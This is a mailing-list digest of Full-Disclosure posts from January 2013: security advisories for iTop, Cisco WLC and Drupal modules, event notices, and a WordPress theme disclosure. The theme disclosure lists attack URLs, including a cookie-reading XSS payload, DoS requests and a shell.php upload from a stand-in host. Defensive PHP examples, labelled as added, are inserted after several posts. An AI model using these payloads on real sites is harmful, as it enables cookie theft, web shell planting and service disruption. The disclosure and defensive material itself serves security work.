Re: [Full-disclosure] Rather interesting whois for yahoo.com?

2013-01-23 Thread Julius Kivimäki
This is normal

2013/1/22 Dan Dart dand...@googlemail.com

 https://gist.github.com/4596868

 Regards
 Dan

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] LACSEC 2013: 8th Network Security Event for Latin America and the Caribbean (CFP)

2013-01-23 Thread Fernando Gont
***
   CALL FOR PRESENTATIONS
***
LACSEC 2013
   8th Network Security Event for Latin America and the Caribbean
May 5-10, 2013, Medellin, Colombia
   http://www.lacnic.net/en/web/eventos/lacnic19


LACNIC (http://www.lacnic.net) is the international organization based
in Uruguay that is responsible for the administration of the IP
address space, Reverse Resolution, Autonomous System Numbers and other
resources for the Latin American and Caribbean region on behalf of
the Internet community.

The 8th Network Security Event for Latin America and the Caribbean
will be held in Medellin, Colombia, within the framework of LACNIC's
eighteenth annual meeting (LACNIC XIX). This is a public call for
presentations for that event.

The topics of interest include, but are not limited to, the following:

* Honeypots, network monitoring and situational awareness tools in
general.
* Fighting spam, particularly spam at its origin (SPF, DKIM and related
technologies; email reputation)
* Fighting phishing and pharming
* Fighting malware
* Internet protocol security
* IPv6 security
* DNSsec
* Security of network infrastructure services (DNS, NTP, etc.)
* Web security
* DoS/DDoS response and mitigation, botnets
* Authentication and access control
* Security in the cloud
* Critical infrastructure protection
* Mobile systems security
* Computer security incident response teams (CSIRTs): creation,
management, experiences
* Security in corporate environments, compliance and auditing, return on
information security investments
* Security management (procedures, operational logs, records, etc.)
* Risk management in Information Security
* Computer forensics
* Protection of privacy
* Legal aspects related to information security


Guidelines for Presenting Proposals

Proposals for the 8th Network Security Event for Latin America and the
Caribbean (LACSEC 2013) must be presented taking into account the
following considerations:

* The proposal may consist of a paper, or (alternatively) an Extended
Abstract plus a draft version of the slides to be used during the
presentation.
* Proposals may be presented in English, Portuguese or Spanish.
* Proposals must be submitted in Portable Document Format (PDF)
* Submissions must be created directly using a word processing system
(scanned articles will not be accepted)
* Presentations may not be longer than 30 minutes.


Submitting a Proposal

Those interested in presenting at LACSEC 2013 must send the following
information to comite_seguri...@lacnic.net within the deadlines set
forth below:

* Full title of the presentation
* A paper or, alternatively, an Extended Abstract and a draft of the
slides to be used during the presentation. The paper should not be
longer than 10 pages. The extended abstract should not contain more than
one thousand (1000) words. The Evaluation Committee may, at its sole
discretion, request additional or complementary information.
* Full name, email address and organization with which the author (or
authors) of the submission is affiliated

For more information, please do not hesitate to contact the Evaluation
Committee at comite_seguri...@lacnic.net.


Proposal Evaluation

The Evaluation Committee created for this purpose will evaluate
proposals based on the following basic criteria:

* Originality
* Technical quality
* Relevance
* Presentation
* Applicability


Speaker's Privileges

LACNIC will cover the registration fee for those authors whose
presentations are accepted. However, speaker travel and accommodation
expenses will not be covered.

Presenters who require financial assistance to attend the event may
apply for the LACNIC Financial Assistance Program. Please read the
corresponding instructions at
http://www.lacnic.net/en/web/eventos/lacnic19. In no case does
applying for the sponsorship program guarantee that financial
assistance will be granted. For more information please contact LACNIC
staff at be...@lacnic.net.


IMPORTANT DATES

* Deadline for proposal submission: March 1st, 2013
* Notification of acceptance: March 11th, 2013
* Deadline for submitting the final version the presentation: May 5th,
2012

8th Network Security Event for Latin America and the Caribbean
(LACSEC 2013)

Chair
  Fernando Gont (SI6 Networks/UTN-FRH, Argentina)

Evaluation Committee
  Iván Arce (Fundación Sadosky, Argentina)
  Carlos A. Ayala Rocha (Arbor Networks, Mexico)
  Julio César Balderrama (ISM GLOBAL S.A., Argentina)
  Matthias Bethke (Zonarix S.A., Ecuador)
  Eduardo Carozo Blumsztein (ITC SA, Uruguay)
  Jeimy J. Cano M. (Fac. de Derecho, U. de los Andes, Colombia)
  Giovanni Cruz Forero (Consultor Independiente, Colombia)
  Lorena Ferreyro (Consultora Independiente, Argentina)
  Javier Liendo (Cisco Mexico, Cisco)
 

[Full-disclosure] DC4420 - London DEFCON - January 2013 meet. Tuesday 29th January 2013

2013-01-23 Thread Major Malfunction
what it says on the tin!

speakers:

   Chris Sumner (Suggy) - Online Privacy Foundation

presenting:

   Predicting Dark Triad Personality Traits from Twitter usage and a 
linguistic analysis of Tweets

   This study explores the extent to which it is possible to determine 
anti-social personality traits based on Twitter use. This was performed 
by comparing the Dark Triad and Big Five personality traits of 2,927 
Twitter users with their profile attributes and use of language. 
Analysis shows that there are some statistically significant 
relationships between these variables. Through the use of crowd sourced 
machine learning algorithms, we show that machine learning provides 
useful prediction rates, but is imperfect in predicting an individual’s 
Dark Triad traits from Twitter activity. While predictive models may be 
unsuitable for predicting an individual’s personality, they may still be 
of practical importance when models are applied to large groups of 
people, such as gaining the ability to see whether anti-social traits 
are increasing or decreasing over a population.

and...

   yours truly Adam Laurie (Major Malfunction) & Zac Franken - Aperture 
Labs Ltd.

presenting:

   Hardware Hacking The Easy Hard Way: Semi-Automating the process of 
decapping chips

   Fancy getting your hands disolved^W dirty with boiling nitric acid? 
Ever wondered what's under the silicon in a silicon chip? And once 
you're under the hood, what next? This short talk will reveal our 
initial explorations into the caustic world of silicon deconstruction. 
There will be toolz...

Venue:

   Downstairs at The Phoenix: http://www.phoenixcavendishsquare.co.uk/

   be there by 19:30..

More:

   http://dc4420.org

see you next week!

cheers,
MM
-- 
In DEFCON, we have no names... errr... well, we do... but silly ones...



[Full-disclosure] CVE-2013-0805

2013-01-23 Thread Stephan Rickauer
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
#
# CVE ID : CVE-2013-0805
# CSNC ID: CSNC-2013-001
# Product: iTop
# Vendor:  Combodo
# Subject: Cross-site Scripting - XSS
# Risk:    High
# Effect:  Remotely exploitable
# Author:  Stephan Rickauer (stephan.rickauer _at_ csnc.ch)
# Date:    January 23rd 2013
#


Introduction:
-------------
Compass Security discovered a security flaw in the iTop web application.


Vulnerable:
-----------
All iTop versions older than:
* trunk revision 2589
* branches/1.2.1, revision 2587
* branches/1.2, revision 2588
* branches/2.0, revision 2590


Not vulnerable:
---------------
unknown


Patches:
--------
Patches have been committed to the SourceForge Trac by the vendor with
respect to all affected versions. Modified files: pages/UI.php and
pages/run_query.php


Fix:
----
Thoroughly encode all user input properly on output.


Description:
------------
The iTop search feature displays the term entered by the user. However, that
very output of the user's input happens mostly un-encoded. The implemented
mitigation step of only encoding  as part of a script tag is inadequate and
can be easily bypassed. Exploiting this vulnerability will lead to so-called
cross-site scripting (XSS) and allows the impersonation of logged-in iTop
users.


Milestones:
-----------
January 4th,  Vulnerability discovered
January 4th,  Vendor contact established
January 7th,  Vendor provided with technical details
January 7th,  Vendor acknowledged issue (support _at_ combodo.com)
January 15th, CVE assigned and vendor notified
January 23rd, Patch committed in all main branches of the iTop project 
by vendor
January 23rd, Public release of advisory


References:
-----------
XSS reference:
http://en.wikipedia.org/wiki/Cross-site_scripting
Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in web applications which allow code injection by malicious
web users into the web pages viewed by other users. Examples of such code
include HTML code and client-side scripts. An exploited cross-site scripting
vulnerability can be used by attackers to bypass access controls such as the
same origin policy. Recently, vulnerabilities of this kind have been exploited
to craft powerful phishing attacks and browser exploits. Cross-site scripting
was originally referred to as CSS, although this usage has been largely
discontinued.

iTop reference:
http://www.combodo.com/iTop-a-new-generation-of-IT.html

Provided evidence:
- Two screenshots
- XSS attack code
- copy of html page showing unencoded output

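The advisory's point is that neutralising only a script tag is not output encoding. The following is an added example, not iTop's code: a constructed "script-tag only" filter next to context-aware encoding of a reflected search term, with a harmless tag and a quote-breaking value as constructed inputs.

```php
<?php
// Added example (not iTop's code): why encoding only "<script>" is not an
// output-encoding strategy, and what context-aware encoding looks like.
declare(strict_types=1);

/**
 * Constructed stand-in for a "script-tag only" mitigation: it neutralises the
 * literal <script> tag and nothing else. Any other markup reaches the browser.
 */
function weakEncode(string $term): string
{
    return str_ireplace(['<script', '</script'], ['&lt;script', '&lt;/script'], $term);
}

/** Correct encoding for text placed between HTML tags. */
function encodeHtmlText(string $term): string
{
    return htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** The same encoder is also right for a double-quoted attribute value. */
function encodeHtmlAttr(string $term): string
{
    return htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Renders the "results for ..." heading and the pre-filled search box. */
function renderSearchPage(string $term): string
{
    return '<h2>Results for ' . encodeHtmlText($term) . '</h2>' . "\n"
         . '<input type="text" name="q" value="' . encodeHtmlAttr($term) . '">';
}

/** True when the rendered fragment contains no unencoded markup from $term. */
function isInert(string $rendered): bool
{
    // After encoding, the only '<', '>' or '"' that may appear are the ones
    // written by our own template, so strip those and look for leftovers.
    $template = ['<h2>Results for ', '</h2>', '<input type="text" name="q" value="', '">'];
    $rest = str_replace($template, '', $rendered);
    return strpbrk($rest, '<>"\'') === false;
}

// Constructed sample inputs: a harmless tag and a value that closes a quote.
$samples = ['<b>bold</b> search', 'plain" title="x'];
foreach ($samples as $term) {
    printf("weak:   %s\n", weakEncode($term));         // markup survives untouched
    printf("strong: %s\n\n", renderSearchPage($term)); // every special char is inert
    assert(isInert(renderSearchPage($term)));
}
```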


[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers

2013-01-23 Thread Cisco Systems Product Security Incident Response Team
Multiple Vulnerabilities in Cisco Wireless LAN Controllers

Advisory ID: cisco-sa-20130123-wlc

Revision 1.0

For Public Release 2013 January 23 16:00 UTC (GMT)
--

Summary
===

The Cisco Wireless LAN Controller (Cisco WLC) product family is
affected by the following four vulnerabilities:

Cisco Wireless LAN Controllers Wireless Intrusion Prevention
System (wIPS) Denial of Service Vulnerability

Cisco Wireless LAN Controllers Session Initiation Protocol Denial
of Service Vulnerability

Cisco Wireless LAN Controllers HTTP Profiling Remote Code
Execution Vulnerability

Cisco Wireless LAN Controllers SNMP Unauthorized Access
Vulnerability

Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate these vulnerabilities are
available.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130123-wlc



[Full-disclosure] [Security-news] SA-CONTRIB-2013-006 - Video - Arbitrary Code Execution

2013-01-23 Thread security-news
View online: http://drupal.org/node/1896714

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-006
  * Project: Video [1] (third-party module)
  * Version: 7.x
  * Date: 2013-January-23
  * Security risk: Less critical [2]
  * Exploitable from: Remote
  * Vulnerability: Arbitrary PHP code execution

 DESCRIPTION  
-

The video module enables you to upload video and audio files and transcode
them into other formats and sizes using other tools like FFmpeg or Zencoder.

The module saves information about the FFmpeg executable in a temporary PHP
file, but doesn't check if the file has been tampered with when reading the
file, allowing any PHP code in that file to be executed.

This vulnerability is mitigated by the fact that an attacker must have write
access to the temporary PHP file (something which is not known to be possible
via the module itself). Sites not using the FFmpeg transcoder are only
vulnerable if the attacker has the 'administer site configuration' permission
in order to change the transcoder to FFmpeg.


 CVE IDENTIFIER(S) ISSUED  


  * /A CVE identifier [3] will be requested, and added upon issuance, in
accordance with Drupal Security Team processes./

 VERSIONS AFFECTED  
---

  * Video 7.x-2.x versions prior to 7.x-2.9.

Drupal core is not affected. If you do not use the contributed Video [4]
module, there is nothing you need to do.

 SOLUTION  


Install the latest version:

  * If you use the Video module for Drupal 7.x, upgrade to Video 7.x-2.9 [5]

Also see the Video [6] project page.

 REPORTED BY  
-

  * Joris van Eijden [7] of the Drupal Security Team

 FIXED BY  


  * Jorrit Schippers [8] the module maintainer

 COORDINATED BY  
--

  * Greg Knaddison [9] of the Drupal Security Team

 CONTACT AND MORE INFORMATION  


The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing
secure code for Drupal [12], and securing your site [13].


[1] http://drupal.org/project/video
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/video
[5] http://drupal.org/node/1895234
[6] http://drupal.org/project/video
[7] http://drupal.org/user/892998
[8] http://drupal.org/user/161217
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration

___
Security-news mailing list
security-n...@drupal.org
Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news

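The advisory describes tool metadata cached as a PHP file that is later executed without any tamper check. As an added example that is not the Video module's code, the cache below is stored as JSON, authenticated with an HMAC under a site-private key (assumed to come from protected settings), and treated as a cache miss when the tag does not verify.

```php
<?php
// Added example (not the Video module's code): cache tool metadata as data,
// not as executable PHP, and authenticate it before trusting it.
declare(strict_types=1);

/**
 * Write $data to $path as JSON with an HMAC-SHA256 tag computed under a
 * site-private key. Assumed: $key comes from protected site settings,
 * not from anywhere the web server user can write.
 */
function writeToolCache(string $path, array $data, string $key): void
{
    $payload = json_encode($data, JSON_THROW_ON_ERROR);
    $record = ['tag' => hash_hmac('sha256', $payload, $key), 'payload' => $payload];
    // Write to a sibling temp file and rename so readers never see a torn file.
    $tmp = $path . '.' . bin2hex(random_bytes(8)) . '.tmp';
    file_put_contents($tmp, json_encode($record, JSON_THROW_ON_ERROR), LOCK_EX);
    chmod($tmp, 0600);
    rename($tmp, $path);
}

/**
 * Read the cache back. Returns null (treat as "cache miss, re-probe FFmpeg")
 * if the file is absent, malformed, or its tag does not verify.
 */
function readToolCache(string $path, string $key): ?array
{
    $raw = @file_get_contents($path);
    if ($raw === false) {
        return null;
    }
    $record = json_decode($raw, true);
    if (!is_array($record) || !isset($record['tag'], $record['payload'])
        || !is_string($record['tag']) || !is_string($record['payload'])) {
        return null;
    }
    $expected = hash_hmac('sha256', $record['payload'], $key);
    if (!hash_equals($expected, $record['tag'])) {
        return null; // modified on disk, or written under a different key
    }
    $data = json_decode($record['payload'], true);
    return is_array($data) ? $data : null;
}

// Demonstration with constructed values.
$key  = bin2hex(random_bytes(32));              // stands in for the site's secret
$path = tempnam(sys_get_temp_dir(), 'ffcache');  // constructed cache location
$info = ['binary' => '/usr/bin/ffmpeg', 'version' => '1.0.0']; // constructed

writeToolCache($path, $info, $key);
assert(readToolCache($path, $key) === $info);

// Anyone with write access to the file edits the cached path: the tag no
// longer matches and the reader falls back to re-probing instead of trusting it.
$record = json_decode(file_get_contents($path), true);
$record['payload'] = json_encode(['binary' => '/tmp/other', 'version' => '1.0.0']);
file_put_contents($path, json_encode($record));
assert(readToolCache($path, $key) === null);

unlink($path);
echo "cache verified, tampering detected\n";
```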


[Full-disclosure] [Security-news] SA-CONTRIB-2013-007 User Relationships - Cross Site Scripting (XSS)

2013-01-23 Thread security-news
View online: http://drupal.org/node/1896720

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-007
  * Project: User Relationships [1] (third-party module)
  * Version: 6.x, 7.x
  * Date: 2013-January-23
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

 DESCRIPTION  
-

The User Relationships module allows you to create multiple relationship
types and maintain relationships between users in your Drupal site.

The module does not sufficiently escape relationship names before display.
This allows users with the correct permissions to create relationship names
containing arbitrary Javascript which will then be executed by the browser.

This vulnerability is mitigated by the fact that an attacker must have a role
with the permission administer user relationships.


 CVE IDENTIFIER(S) ISSUED  


  * /A CVE identifier [3] will be requested, and added upon issuance, in
accordance with Drupal Security Team processes./

 VERSIONS AFFECTED  
---

  * User Relationships 6.x-1.x versions prior to 6.x-1.4
  * User Relationships 7.x-1.x versions prior to 7.x-1.0-alpha5

Drupal core is not affected. If you do not use the contributed User
Relationships [4] module, there is nothing you need to do.

 SOLUTION  


Install the latest version:

  * If you use the User Relationships module for Drupal 6.x, upgrade to User
Relationships 6.x-1.4 [5]
  * If you use the User Relationships module for Drupal 7.x, upgrade to User
Relationships 7.x-1.0-alpha5 [6]

Also see the User Relationships [7] project page.

 REPORTED BY  
-

  * Klaus Purer [8] of the Drupal Security Team

 FIXED BY  


  * Mark Ferree [9] the module maintainer

 COORDINATED BY  
--

  * Klaus Purer [10] of the Drupal Security Team

 CONTACT AND MORE INFORMATION  


The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing
secure code for Drupal [13], and securing your site [14].


[1] http://drupal.org/project/user_relationships
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/user_relationships
[5] http://drupal.org/node/1896272
[6] http://drupal.org/node/1896276
[7] http://drupal.org/project/user_relationships
[8] http://drupal.org/user/262198
[9] http://drupal.org/user/76245
[10] http://drupal.org/user/262198
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration



[Full-disclosure] [Security-news] SA-CONTRIB-2013-008 - CurvyCorners - Cross Site Scripting (XSS) - module unsupported

2013-01-23 Thread security-news
View online: http://drupal.org/node/1896718

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-008
  * Project: CurvyCorners [1] (third-party module)
  * Version: 6.x, 7.x
  * Date: 2013-January-23
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

 DESCRIPTION  
-

The CurvyCorners module enables you to create rounded corners on HTML block
elements.

The module doesn't sufficiently filter user entered text when being
displayed.

This vulnerability is mitigated by the fact that an attacker must have a role
with the permission administer curvycorners.


 CVE IDENTIFIER(S) ISSUED  


  * CVE-2013-1393

 VERSIONS AFFECTED  
---

  * All CurvyCorners 6.x-1.x versions.
  * All CurvyCorners 7.x-1.x versions.

Drupal core is not affected. If you do not use the contributed CurvyCorners
[3] module, there is nothing you need to do.

 SOLUTION  


Install the latest version:

  * If you use the CurvyCorners module, uninstall the module - there is no
patch available to fix this issue

Also see the CurvyCorners [4] project page.

 REPORTED BY  
-

  * rickauer [5]

 FIXED BY  


Not applicable.

 COORDINATED BY  
--

  * Greg Knaddison [6] of the Drupal Security Team

 CONTACT AND MORE INFORMATION  


The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [7].

Learn more about the Drupal Security team and their policies [8], writing
secure code for Drupal [9], and securing your site [10].


[1] http://drupal.org/project/curvycorners
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/curvycorners
[4] http://drupal.org/project/curvycorners
[5] http://drupal.org/user/69553
[6] http://drupal.org/user/36762
[7] http://drupal.org/contact
[8] http://drupal.org/security-team
[9] http://drupal.org/writing-secure-code
[10] http://drupal.org/security/secure-configuration



[Full-disclosure] [Security-news] SA-CONTRIB-2013-009 - Keyboard Shortcut Utility - Access Bypass - module unsupported

2013-01-23 Thread security-news
View online: http://drupal.org/node/1896752

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-009
  * Project: Keyboard Shortcut Utility [1] (third-party module)
  * Version: 7.x
  * Date: 2013-January-23
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Access bypass

 DESCRIPTION  
-

The Keyboard Shortcut Utility module enables you to create keyboard shortcuts
on your website. You can create a shortcut to go to a page (internal or
external) or call a JavaScript function.

The module doesn't sufficiently check node access to view nodes for users who
have view shortcuts permission. It also doesn't check node access to view,
edit, or delete nodes for users who have the admin shortcuts permission.

This vulnerability is mitigated by the fact that an attacker must have a role
with the permission view shortcuts or admin shortcuts.


 CVE IDENTIFIER(S) ISSUED  


  * /A CVE identifier [3] will be requested, and added upon issuance, in
accordance with Drupal Security Team processes./

 VERSIONS AFFECTED  
---

  * All Keyboard Shortcut Utility 7.x-1.x versions.

Drupal core is not affected. If you do not use the contributed Keyboard
Shortcut Utility [4] module, there is nothing you need to do.

 SOLUTION  


Uninstall the module. No patched version is available.

Also see the Keyboard Shortcut Utility [5] project page.

 REPORTED BY  
-

  * Michael Griego [6]

 FIXED BY  


Not applicable.

 COORDINATED BY  
--

  * Ivo Van Geertruyen [7] of the Drupal Security Team

 CONTACT AND MORE INFORMATION  


The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [8].

Learn more about the Drupal Security team and their policies [9], writing
secure code for Drupal [10], and securing your site [11].


[1] http://drupal.org/project/keyboard_shortcut
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/keyboard_shortcut
[5] http://drupal.org/project/keyboard_shortcut
[6] http://drupal.org/user/524484
[7] http://drupal.org/user/383424
[8] http://drupal.org/contact
[9] http://drupal.org/security-team
[10] http://drupal.org/writing-secure-code
[11] http://drupal.org/security/secure-configuration



[Full-disclosure] sql query displaying on error

2013-01-23 Thread Fayyaz Ali
http://demo.demolink.biz/index.php?option=com_content&view=article&id=94&Itemid=236

Table './demolink_ccdemo/are1s_session' is marked as crashed and should be
repaired SQL=INSERT INTO `are1s_session` (`session_id`, `client_id`,
`time`) VALUES ('526944509a863ca28cd0dd7763eb1e3e', 0, '1358966730')

[Full-disclosure] [Security-news] SA-CONTRIB-2013-010 - Search API sorts - Cross Site Scripting (XSS)

2013-01-23 Thread security-news
View online: http://drupal.org/node/1896782

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-010
  * Project: Search API sorts [1] (third-party module)
  * Version: 7.x
  * Date: 2013-January-23
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

 DESCRIPTION  
-

This module enables you to sort by Search API facets.

The module doesn't sufficiently filter user entered text in field labels.

This vulnerability is mitigated by the fact that an attacker must have a role
with the ability to modify field labels such as administer taxonomy.


 CVE IDENTIFIER(S) ISSUED  


  * /A CVE identifier [3] will be requested, and added upon issuance, in
accordance with Drupal Security Team processes./

 VERSIONS AFFECTED  
---

  * Search API Sorts 7.x-1.x versions prior to 7.x-1.4.

Drupal core is not affected. If you do not use the contributed Search API
sorts [4] module, there is nothing you need to do.

 SOLUTION  


Install the latest version:

  * If you use the Search API Sorts module for Drupal 7.x, upgrade to Search
API Sorts 7.x-1.4 [5]

Also see the Search API sorts [6] project page.

 REPORTED BY  
-

  * Francisco José Cruz Romanos [7]

 FIXED BY  


  * Francisco José Cruz Romanos [8]

 COORDINATED BY  
--

  * Klaus Purer [9] of the Drupal Security Team
  * Greg Knaddison [10] of the Drupal Security Team

 CONTACT AND MORE INFORMATION  


The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing
secure code for Drupal [13], and securing your site [14].


[1] http://drupal.org/project/1097626
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/1097626
[5] http://drupal.org/node/1896756
[6] http://drupal.org/project/1097626
[7] https://drupal.org/user/848238
[8] https://drupal.org/user/848238
[9] http://drupal.org/user/262198
[10] http://drupal.org/user/36762
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration


[Full-disclosure] Multiple vulnerabilities in Chocolate WP theme for WordPress

2013-01-23 Thread MustLive
Hello list!

I want to warn you about multiple vulnerabilities in Chocolate WP theme for 
WordPress. This is a commercial theme for WP.

These are Cross-Site Scripting, Full path disclosure, Abuse of 
Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.

In 2011 I wrote about Cross-Site Scripting (WASC-08), Full path disclosure 
(WASC-13), Abuse of Functionality (WASC-42) and Denial of Service (WASC-10) 
vulnerabilities in TimThumb and multiple themes for WordPress 
(http://websecurity.com.ua/4910/), and later an Arbitrary File Uploading 
(WASC-31) vulnerability was also disclosed. In previous years I've written 
about multiple vulnerabilities in 145 WP themes (http://websecurity.com.ua/4915/), 
and here is another theme.

-
Affected products:
-

All versions of Chocolate WP theme for WordPress are vulnerable. I informed 
the developers about these vulnerabilities earlier.

--
Details:
--

XSS (WASC-08) (in older versions of TimThumb):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3C111

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1&w=111

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com&h=1&w=1

(bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1

(bypass of restriction on domain, if such restriction is turned on)

You can read about such Abuse of Functionality and Denial of Service 
vulnerabilities in my article Using of the sites for attacks on other sites 
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/

Besides index.php, there is also potentially FPD in other PHP files of this 
theme.

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


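The post notes that a URL on site.badsite.com can pass a restriction meant to allow only the site's own domain. As an added example, not TimThumb's or the theme's code, the lax check below is a construction that matches an allowed name as a prefix of the hostname, and the strict check compares the parsed host exactly against a constructed allowlist.

```php
<?php
// Added example (not TimThumb's or the theme's code): checking a remote image
// URL against an allowlist of hosts. The lax variant is a construction that
// shows the shape of check a "site.badsite.com" URL slips past.
declare(strict_types=1);

const ALLOWED_HOSTS = ['site', 'www.site']; // constructed allowlist (assumption)

/** Lax: accepts any host that merely starts with an allowed name. */
function laxHostAllowed(string $url): bool
{
    $host = parse_url($url, PHP_URL_HOST);
    if (!is_string($host)) {
        return false;
    }
    foreach (ALLOWED_HOSTS as $allowed) {
        if (stripos($host, $allowed) === 0) {
            return true;
        }
    }
    return false;
}

/** Strict: scheme must be http(s) and the whole host must match an allowed name. */
function strictHostAllowed(string $url): bool
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // Normalise case and a trailing dot, then require an exact match.
    $host = rtrim(strtolower($parts['host']), '.');
    return in_array($host, ALLOWED_HOSTS, true);
}

// Constructed cases: the expected decision is the strict one.
$cases = [
    'http://site/page.png'             => true,
    'http://site.badsite.com/page.png' => false, // the shape shown in the post
    'http://www.site/x.png'            => true,
    'http://SITE./x.png'               => true,
];
foreach ($cases as $url => $shouldAllow) {
    printf("%-34s lax=%-3s strict=%-3s\n", $url,
        laxHostAllowed($url) ? 'yes' : 'no', strictHostAllowed($url) ? 'yes' : 'no');
    assert(strictHostAllowed($url) === $shouldAllow);
}
```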